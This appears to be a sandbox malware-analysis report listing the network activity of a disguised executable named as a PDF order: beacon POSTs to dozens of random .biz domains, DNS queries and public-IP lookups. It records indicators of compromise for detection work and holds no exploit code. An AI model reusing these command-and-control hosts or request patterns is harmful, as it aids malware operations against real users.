Source: global traffic	HTTP traffic detected: POST /eat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /econcn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /kvfj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jhyup HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /bvcagfvbtmiono HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /l HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /kg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /wccluv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /fjahduvqc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qafronspqjihpms HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qij HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /tqsyw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qvfjyyauphqhfohc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /bb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /kdqjc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /yy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /j HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /q HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rcsqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xindlfknrhvc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mfrwurnrh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /reejrob HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ircdert HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /msoqwwrwyts HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rmkysabgpk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /bdggmyte HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lrupjiow HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /svjoivwb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49737 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_00454EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00454EB5

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic	DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: s82.gocheapweb.com
Source: global traffic	DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic	DNS traffic detected: DNS query: przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: zlenh.biz
Source: global traffic	DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic	DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic	DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic	DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic	DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic	DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic	DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic	DNS traffic detected: DNS query: saytjshyf.biz
Source: global traffic	DNS traffic detected: DNS query: vcddkls.biz
Source: global traffic	DNS traffic detected: DNS query: fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: tbjrpv.biz
Source: global traffic	DNS traffic detected: DNS query: deoci.biz
Source: global traffic	DNS traffic detected: DNS query: gytujflc.biz
Source: global traffic	DNS traffic detected: DNS query: qaynky.biz
Source: global traffic	DNS traffic detected: DNS query: bumxkqgxu.biz
Source: global traffic	DNS traffic detected: DNS query: dwrqljrr.biz
Source: global traffic	DNS traffic detected: DNS query: nqwjmb.biz
Source: global traffic	DNS traffic detected: DNS query: ytctnunms.biz
Source: global traffic	DNS traffic detected: DNS query: myups.biz
Source: global traffic	DNS traffic detected: DNS query: oshhkdluh.biz
Source: global traffic	DNS traffic detected: DNS query: yunalwv.biz
Source: global traffic	DNS traffic detected: DNS query: jpskm.biz
Source: global traffic	DNS traffic detected: DNS query: lrxdmhrr.biz
Source: global traffic	DNS traffic detected: DNS query: wllvnzb.biz
Source: global traffic	DNS traffic detected: DNS query: gnqgo.biz
Source: global traffic	DNS traffic detected: DNS query: jhvzpcfg.biz
Source: global traffic	DNS traffic detected: DNS query: acwjcqqv.biz
Source: global traffic	DNS traffic detected: DNS query: lejtdj.biz
Source: global traffic	DNS traffic detected: DNS query: vyome.biz
Source: global traffic	DNS traffic detected: DNS query: yauexmxk.biz
Source: global traffic	DNS traffic detected: DNS query: iuzpxe.biz
Source: global traffic	DNS traffic detected: DNS query: sxmiywsfv.biz
Source: global traffic	DNS traffic detected: DNS query: vrrazpdh.biz
Source: global traffic	DNS traffic detected: DNS query: ftxlah.biz
Source: global traffic	DNS traffic detected: DNS query: typgfhb.biz
Source: global traffic	DNS traffic detected: DNS query: esuzf.biz
Source: global traffic	DNS traffic detected: DNS query: gvijgjwkh.biz
Source: global traffic	DNS traffic detected: DNS query: qpnczch.biz
Source: global traffic	DNS traffic detected: DNS query: brsua.biz
Source: global traffic	DNS traffic detected: DNS query: dlynankz.biz
Source: global traffic	DNS traffic detected: DNS query: oflybfv.biz
Source: global traffic	DNS traffic detected: DNS query: yhqqc.biz
Source: global traffic	DNS traffic detected: DNS query: mnjmhp.biz
Source: global traffic	DNS traffic detected: DNS query: opowhhece.biz
Source: global traffic	DNS traffic detected: DNS query: zjbpaao.biz
Source: global traffic	DNS traffic detected: DNS query: jdhhbs.biz
Source: global traffic	DNS traffic detected: DNS query: mgmsclkyu.biz
Source: global traffic	DNS traffic detected: DNS query: warkcdu.biz
Source: global traffic	DNS traffic detected: DNS query: gcedd.biz
Source: global traffic	DNS traffic detected: DNS query: jwkoeoqns.biz
Source: global traffic	DNS traffic detected: DNS query: xccjj.biz
Source: global traffic	DNS traffic detected: DNS query: hehckyov.biz
Source: global traffic	DNS traffic detected: DNS query: rynmcq.biz
Source: global traffic	DNS traffic detected: DNS query: uaafd.biz
Source: global traffic	DNS traffic detected: DNS query: eufxebus.biz
Source: global traffic	DNS traffic detected: DNS query: pwlqfu.biz
Source: global traffic	DNS traffic detected: DNS query: rrqafepng.biz
Source: global traffic	DNS traffic detected: DNS query: ctdtgwag.biz
Source: global traffic	DNS traffic detected: DNS query: tnevuluw.biz

Source: unknown

HTTP traffic detected: POST /tbqsdcfeojy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 856

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 28 Nov 2024 05:43:08 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 28 Nov 2024 05:43:08 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
